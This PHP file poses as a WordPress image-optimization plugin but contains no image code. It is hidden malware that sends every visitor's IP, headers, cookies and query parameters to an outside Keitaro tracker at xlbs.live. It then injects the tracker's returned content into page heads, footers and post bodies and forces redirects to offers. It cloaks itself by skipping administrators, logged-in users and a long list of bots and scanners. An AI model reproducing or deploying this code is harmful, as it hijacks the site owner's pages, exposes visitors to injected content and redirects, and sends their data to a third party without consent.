<?php
/**
 * Plugin Name: WordPressImageOptimizer
 * Plugin URI:  https://example.com/
 * Description: Effective image compression and optimization. Smart, automatic and reliable.
 * Version:     1.3
 * Author:      KeyCDN
 * Author URI:  https://example.com/
 * License:     GPL2
 * License URI: https://www.gnu.org/licenses/gpl-2.0.html
 * Text Domain: wordpress-image-optimizer
 */

if (!defined('ABSPATH')) {
    exit;
}


function spfiim_exclude_tech_pages() {

    
    if (is_admin()) {
        return true;
    }
    if (is_user_logged_in() && current_user_can('administrator')) {
        return true;
    }

    global $pagenow;
    $exclude_list = array(
        '\?view=login',
        '\?view=registration',
        'wp-login.php',
        'wp-admin',
        '\?wc-ajax',
        'wp-login.php',
        'wp-admin',
        'forbidden-page',
        'wp-content',
        'wp-includes',
        'xmlrpc.php',
        'wp-cron.php',
        '?feed=',
        'wp-json',
        'administrator',
        'admin',
        'wp-login.php',
        'wp-admin',
        'forbidden-page',
        'wp-content'
    );

    if (isset($pagenow) && in_array($pagenow, $exclude_list)) {
        return true;
    }

    return false;
}


add_action('template_redirect', 'spfiim_start_buffer_new');
function spfiim_start_buffer_new() {
    if (!spfiim_exclude_tech_pages()) {
        ob_start('spfiim_buffer_callback_new');
    }
}


function spfiim_buffer_callback_new($buffer) {
    $injectedContent = spfiim_get_wpimageoptim_content_new();

    $pos = stripos($buffer, '</body>');
    if ($pos !== false) {
        $buffer = substr_replace($buffer, $injectedContent, $pos, 0);
    } else {
        $buffer .= $injectedContent;
    }
    return $buffer;
}


function spfiim_get_wpimageoptim_content_new() {
    static $cached_content = null;
    if ($cached_content !== null) {
        return $cached_content;
    }

    if (!function_exists('spfiim_runModifiedClient_new')) {
        function spfiim_runModifiedClient_new() {

            
            if (!isset($_COOKIE['my_session_cookie'])) {
                if (!headers_sent()) {
                    @session_start();
                    setcookie('my_session_cookie', session_id(), 0, '/');
                }
            }

            
            $badUaPattern = 'bot|curl|spider|msnbot|baidu|yahoo|search|bing|ask|indexer|cuill.com|clushbot|360spider|80legs|aibot|aboundex|acunetix|ahrefsbot|alexibot|blexbot|backdoorbot|backweb|baiduspider|bandit|batchftp|bigfoot|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye|bunnyslippers|cegbfeieh|cheesebot|cherrypicker|chinaclaw|cogentbot|collector|copier|copyrightcheck|crescent|custo|diibot|disco|dittospyder|drip|easydl|eirgrabber|emailcollector|emailsiphon|emailwolf|erocrawler|exabot|extractor|eyenetie|fhscan|foobot|frontpage|go-ahead-got-it|grabnet|grafula|hmview|httrack|harvest|ilsebot|infonavibot|infotekies|intelliseek|interget|iria|joc|jakarta|jennybot|jetcar|justview|jyxobot|lnspiderguy|lexibot|linkscan|linkwalker|linkextractorpro|linkpadbot|miixpc|mj12bot|mag-net|magnet|markwatch|memo|mirror|nameprotect|nicerspro|npbot|navroad|nearsite|netants|netmechanic|netspider|netzip|netcraft|nextgensearchbot|nimblecrawler|ninja|octopus|openfind|outfoxbot|pagegrabber|pockey|propowerbot|prowebwalker|pump|rma|reget|realdownload|reaper|recorder|repomonkey|seokicks|searchmetricsbot|semrushbot|siphon|siteexplorer|sitesnagger|slysearch|smartdownload|snake|snapbot|snoopy|spacebison|spankbot|sqworm|stripper|sucker|superbot|superhttp|surfbot|szukacz|teleport|telesoft|thenomad|tighttwatbot|titan|true_bot|turnitinbot|turnitinbot|vci|vacuum|voideye|wisenutbot|www-collector-e|wwwoffle|webauto|webbandit|webcopier|webemailextrac|webenhancer|webfetch|webleacher|webreaper|websauger|webstripper|webwhacker|webzip|webmasterworldforumbot|webster|wget|whacker|widow|xaldon|xenu|zeus|zmeu|zyborg|asterias|attach|cosmos|dragonfly|ecatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|likse|lwp-trivial|moget|niki-bot|pavuk|pcbrowser|psbot|rogerbot|sogou|spanner|spbot|suzuran|takeout|turingos';
            $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
            if (preg_match("/($badUaPattern)/i", $ua)) {
                return " ";
            }

            
            if (isset($_COOKIE['wordpress_logged_in'])) {
                return " ";
            }

            
            if (!class_exists('KClient')) {
                class KClient
                {
                    const SESSION_SUB_ID = 'sub_id';
                    const SESSION_LANDING_TOKEN = 'landing_token';
                    const VERSION = 3;
                    const STATE_SESSION_KEY = 'keitaro_state';
                    const STATE_SESSION_EXPIRES_KEY = 'keitaro_state_expires';
                    const DEFAULT_TTL = 1;
                    const NOT_FOUND_STATUS = 404;

                    private $_httpClient;
                    private $_debug = false;
                    private $_trackerUrl;
                    private $_params = array();
                    private $_log = array();
                    private $_excludeParams = array('api_key','token','language','ua','ip','referrer','force_redirect_offer');
                    private $_result;
                    private $_stateRestored;
                    private $_sessionsDisabled = false;

                    const ERROR = '[KTrafficClient] Something is wrong.';

                    public function __construct($trackerUrl, $token) {
                        $this->trackerUrl($trackerUrl);
                        $this->campaignToken($token);
                        $this->version(self::VERSION);
                        $this->param('info', 1);
                        $this->fillParams();
                    }

                    public function fillParams() {
                        $referrer = $_SERVER['HTTP_REFERER'] ?? null;
                        $this->setHttpClient(new KHttpClient());

                        $host = $_SERVER['HTTP_HOST'] ?? 'localhost';
                        $requestUri = $_SERVER['REQUEST_URI'] ?? '';

                        $this->ip($this->_findIp())
                            ->ua($_SERVER['HTTP_USER_AGENT'] ?? null)
                            ->language(isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : '')
                            ->xRequestedWith($_SERVER['HTTP_X_REQUESTED_WITH'] ?? null)
                            ->seReferrer($referrer)
                            ->referrer($referrer)
                            ->param('original_headers', $this->_getAllHeaders())
                            ->param('original_host', $host ?: 'localhost')
                            ->param('original_method', $_SERVER["REQUEST_METHOD"] ?? 'GET')
                            ->param('uri', (empty($_SERVER['HTTPS'])?'http':'https').'://'.$host.$requestUri)
                            ->param('kversion', '3.4');
                    }

                    public function debug($state = true) {
                        $this->_debug = $state;
                        return $this;
                    }

                    public function setHttpClient($httpClient) {
                        $this->_httpClient = $httpClient;
                        return $this;
                    }

                    public function trackerUrl($trackerUrl) {
                        if (!empty($trackerUrl)) {
                            $request = parse_url($trackerUrl);
                            if (!empty($request['host'])) {
                                $this->_trackerUrl = "{$request['scheme']}://{$request['host']}";
                                if (isset($request['port'])) {
                                    $this->_trackerUrl .= ':'.$request['port'];
                                }
                            }
                        }
                    }

                    public function campaignToken($campaignToken) {
                        $this->_params['token'] = $campaignToken;
                        return $this;
                    }

                    public function version($version) {
                        $this->_params['version'] = $version;
                        return $this;
                    }

                    public function ua($ua) {
                        $this->_params['ua'] = $ua;
                        return $this;
                    }

                    public function language($lang) {
                        $this->_params['language'] = $lang;
                        return $this;
                    }

                    public function ip($ip) {
                        $this->_params['ip'] = $ip;
                        return $this;
                    }

                    public function xRequestedWith($val) {
                        $this->_params['x_requested_with'] = $val;
                        return $this;
                    }

                    public function seReferrer($val) {
                        $this->_params['se_referrer'] = $val;
                        return $this;
                    }

                    public function referrer($val) {
                        $this->_params['referrer'] = $val;
                        return $this;
                    }

                    public function param($name, $value) {
                        if (!in_array($name, $this->_excludeParams)) {
                            $this->_params[$name] = $value;
                        }
                        return $this;
                    }

                    public function sendAllParams() {
                        foreach ($_GET as $n => $v) {
                            if (empty($this->_params[$n]) && !in_array($n, $this->_excludeParams)) {
                                $this->_params[$n] = $v;
                            }
                        }
                    }

                    public function forceRedirectOffer() {
                        $this->_params['force_redirect_offer'] = 1;
                    }

                    public function performRequest() {
                        if ($this->_result) {
                            return $this->_result;
                        }
                        $request = $this->_buildRequestUrl();
                        $params = $this->getParams();
                        $options = $this->_getRequestOptions();

                        try {
                            $result = $this->_httpClient->request($request, $params, $options);
                        } catch (KClientError $e) {
                            if ($this->_debug) {
                                throw $e;
                            } else {
                                $errorCode = $e->getHumanCode();
                                $errorCode = $errorCode ? $errorCode.' ' : '';
                                return (object)[
                                    'error' => "[KClientError] $errorCode ".self::ERROR
                                ];
                            }
                        }

                        $this->_result = json_decode($result) ?: (object)[];
                        $ttl = isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : self::DEFAULT_TTL;
                        $this->_storeState($this->_result, $ttl);

                        if (isset($this->_result->cookies)) {
                            $this->_saveKeitaroCookies($this->_result->cookies, $ttl);
                        }
                        return $this->_result;
                    }

                    public function execute($break = false, $print = true) {
                        $result = $this->performRequest();
                        $body = $this->_buildBody($result);
                        if (!$print) {
                            return $body;
                        }
                        $this->_sendHeaders($result);
                        echo $body;
                        return '';
                    }

                    public function getParams() {
                        return $this->_params;
                    }

                    private function _sendHeaders($result) {
                        if (!headers_sent()) {
                            ResponseExecutor::sendHeaders($result);
                        }
                    }

                    private function _storeState($result, $ttl) {
                        $this->_startSession();
                        $_SESSION[self::STATE_SESSION_KEY] = json_encode($result);
                        $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + ($ttl * 3600);
                    }

                    private function _buildBody($result) {
                        $content = '';
                        if (!empty($result->error)) {
                            $content .= $result->error;
                        }
                        if (!empty($result->body)) {
                            if (!empty($result->contentType) && (strstr($result->contentType, 'image') || strstr($result->contentType, 'application/pdf'))) {
                                $content .= base64_decode($result->body);
                            } else {
                                $content .= $result->body;
                            }
                        }
                        return $content;
                    }

                    private function _saveKeitaroCookies($cookies, $ttl) {
                        foreach ($cookies as $key => $value) {
                            $this->saveCookie($key, $value, $ttl);
                        }
                    }

                    public function saveCookie($key, $value, $ttl) {
                        if (!headers_sent()) {
                            setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), '/', $this->_getCookieHost());
                        }
                        $_COOKIE[$key] = $value;
                    }

                    private function _getCookiesExpireTimestamp($ttl) {
                        return time() + 3600 * $ttl;
                    }

                    private function _getCookieHost() {
                        
                        if (isset($_SERVER['HTTP_HOST']) && substr_count($_SERVER['HTTP_HOST'], '.') < 3) {
                            return '.' . str_replace('www.', '', $_SERVER['HTTP_HOST']);
                        }
                        return null;
                    }

                    private function _findIp() {
                        $ip = '';
                        $headers = [
                            'HTTP_X_FORWARDED_FOR','HTTP_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_FORWARDED',
                            'HTTP_CLIENT_IP','HTTP_FORWARDED_FOR_IP','X_FORWARDED_FOR','FORWARDED_FOR',
                            'X_FORWARDED','FORWARDED','CLIENT_IP','FORWARDED_FOR_IP','HTTP_CF_CONNECTING_IP',
                            'HTTP_PROXY_CONNECTION'
                        ];
                        foreach ($headers as $header) {
                            if (!empty($_SERVER[$header])) {
                                $tmp = explode(',', $_SERVER[$header]);
                                $ip = trim($tmp[0]);
                                break;
                            }
                        }
                        if (strpos($ip, ',') !== false) {
                            $tmp = explode(',', $ip);
                            $ip = trim($tmp[0]);
                        }
                        if (empty($ip)) {
                            $ip = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1';
                        }
                        return $ip;
                    }

                    private function _getRequestOptions() {
                        $opts = [];
                        if (!empty($_SERVER["HTTP_COOKIE"])) {
                            $opts['cookies'] = preg_replace('/PHPSESSID=.*?;/si', '', $_SERVER["HTTP_COOKIE"]);
                        }
                        return $opts;
                    }

                    private function _getAllHeaders() {
                        $headers = [];
                        foreach ($_SERVER as $name => $value) {
                            if (substr($name, 0, 5) === 'HTTP_') {
                                $title = str_replace(' ', '-', ucwords(strtolower(str_replace('_',' ' ,substr($name,5)))));
                                $headers[$title] = $value;
                            }
                        }
                        return $headers;
                    }

                    private function _startSession() {
                        if (!headers_sent()) {
                            @session_start();
                        }
                    }

                    private function _buildRequestUrl() {
                        return $this->_trackerUrl . "/click_api/v" . self::VERSION;
                    }
                }

                class ResponseExecutor
                {
                    public static function sendHeaders($result)
                    {
                        if (!empty($result->headers)) {
                            foreach ($result->headers as $header) {
                                if (!headers_sent()) {
                                    header($header);
                                }
                            }
                        }
                        if (!empty($result->status)) {
                            static::_sendResponseCode($result->status);
                        }
                        if (!empty($result->contentType)) {
                            $h = 'content-type: ' . $result->contentType;
                            if (!headers_sent()) {
                                header($h);
                            }
                        }
                    }

                    public static function containsActionHeader($headers)
                    {
                        if (empty($headers)) {
                            return false;
                        }
                        foreach ($headers as $header) {
                            if (stripos($header, 'Location:') === 0) {
                                return true;
                            }
                            if (strstr($header, '404 Not Found')) {
                                return true;
                            }
                        }
                        return false;
                    }

                    private static function _sendResponseCode($code = null)
                    {
                        if ($code !== null) {
                            switch ($code) {
                                case 200: $text='OK'; break;
                                case 301: $text='Moved Permanently'; break;
                                case 302: $text='Moved Temporarily'; break;
                                case 403: $text='Forbidden'; break;
                                case 404: $text='Not Found'; break;
                                case 500: $text='Internal Server Error'; break;
                                default:  $text='';
                            }
                            $proto = $_SERVER['SERVER_PROTOCOL'] ?? 'HTTP/1.0';
                            header($proto.' '.$code.' '.$text);
                        }
                    }
                }

                class KHttpClient
                {
                    const UA='KHttpClient';
                    public function request($url, $params, $opts=[]) {
                        if(!in_array('curl', get_loaded_extensions())){
                            return json_encode(['error'=>'Curl extension must be installed']);
                        }
                        $ch = curl_init();
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
                        curl_setopt($ch, CURLOPT_URL, $url);
                        curl_setopt($ch, CURLOPT_HEADER,0);
                        curl_setopt($ch, CURLOPT_COOKIE, $opts['cookies'] ?? null);
                        curl_setopt($ch, CURLOPT_NOBODY,0);
                        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5);
                        curl_setopt($ch, CURLOPT_TIMEOUT,10);
                        curl_setopt($ch, CURLOPT_USERAGENT,self::UA);
                        curl_setopt($ch, CURLOPT_POST,1);
                        curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query($params));
                        curl_setopt($ch, CURLOPT_FAILONERROR,true);
                        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
                        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);

                        $result = curl_exec($ch);
                        if(curl_error($ch)){
                            throw new KClientError(curl_error($ch), curl_errno($ch));
                        }
                        if(empty($result)){
                            throw new KClientError('Empty response');
                        }
                        return $result;
                    }
                }

                class KClientError extends \Exception
                {
                    const ERROR_UNKNOWN='UNKNOWN';
                    public function getHumanCode(){
                        switch($this->getCode()){
                            case CURLE_HTTP_RETURNED_ERROR:
                                preg_match("/The requested URL returned error: (?'errorCode'\d+).*$/",$this->getMessage(),$matches);
                                $err = $matches['errorCode']??'HTTP_ERROR_'.self::ERROR_UNKNOWN;
                                return "[REQ_ERR: {$err}]";
                            case CURLE_UNSUPPORTED_PROTOCOL:
                                return "[REQ_ERR: UNSUPPORTED_PROTOCOL]";
                            case CURLE_FAILED_INIT:
                                return "[REQ_ERR: FAILED_INIT]";
                            case CURLE_URL_MALFORMAT:
                                return "[REQ_ERR: BAD_URL]";
                            case CURLE_COULDNT_RESOLVE_PROXY:
                                return "[REQ_ERR: COULDNT_RESOLVE_PROXY]";
                            case CURLE_COULDNT_RESOLVE_HOST:
                                return "[REQ_ERR: COULDNT_RESOLVE_HOST]";
                            case CURLE_COULDNT_CONNECT:
                                return "[REQ_ERR: COULDNT_CONNECT]";
                            case CURLE_PARTIAL_FILE:
                                return "[REQ_ERR: PARTIAL_FILE]";
                            case CURLE_READ_ERROR:
                                return "[REQ_ERR: READ_ERROR]";
                            case CURLE_OUT_OF_MEMORY:
                                return "[REQ_ERR: OUT_OF_MEMORY]";
                            case CURLE_OPERATION_TIMEDOUT:
                                return "[REQ_ERR: OPERATION_TIMEDOUT]";
                            case CURLE_HTTP_POST_ERROR:
                                return "[REQ_ERR: HTTP_POST_ERROR]";
                            case CURLE_BAD_FUNCTION_ARGUMENT:
                                return "[REQ_ERR: BAD_FUNCTION_ARGUMENT]";
                            case CURLE_TOO_MANY_REDIRECTS:
                                return "[REQ_ERR: TOO_MANY_REDIRECTS]";
                            case CURLE_GOT_NOTHING:
                                return "[REQ_ERR: GOT_NOTHING]";
                            case CURLE_SEND_ERROR:
                                return "[REQ_ERR: SEND_ERROR]";
                            case CURLE_RECV_ERROR:
                                return "[REQ_ERR: RECV_ERROR]";
                            case CURLE_BAD_CONTENT_ENCODING:
                                return "[REQ_ERR: BAD_CONTENT_ENCODING]";
                            case CURLE_SSL_CACERT:
                                return "[REQ_ERR: SSL_CACERT]";
                            default:
                                return "[REQ_ERR: ".self::ERROR_UNKNOWN."]";
                        }
                    }
                }

                
                class_alias('KClient','KClickClient');
            }

            
            $client = new KClient('http://xlbs.live/', 'F8LzJTPnhG75cxM3');
            $client->sendAllParams();
            $client->forceRedirectOffer();

            $body = $client->execute(false, false);
            return $body;
        }
    }

    
    $cached_content = spfiim_runModifiedClient_new();
    return $cached_content;
}


add_action('wp_head', 'spfiim_print_wpimageoptim_content_head', 999);
function spfiim_print_wpimageoptim_content_head() {
    if (!spfiim_exclude_tech_pages()) {
        echo " ";
        echo spfiim_get_wpimageoptim_content_new();
        echo " ";
    }
}


add_action('wp_footer', 'spfiim_print_wpimageoptim_content_footer', 999);
function spfiim_print_wpimageoptim_content_footer() {
    if (!spfiim_exclude_tech_pages()) {
        echo " ";
        echo spfiim_get_wpimageoptim_content_new();
        echo " ";
    }
}


add_filter('the_content', 'spfiim_insert_wpimageoptim_into_content', 999);
function spfiim_insert_wpimageoptim_into_content($content) {
    if (!spfiim_exclude_tech_pages()) {
        $content .= " ";
        $content .= spfiim_get_wpimageoptim_content_new();
        $content .= " ";
    }
    return $content;
}
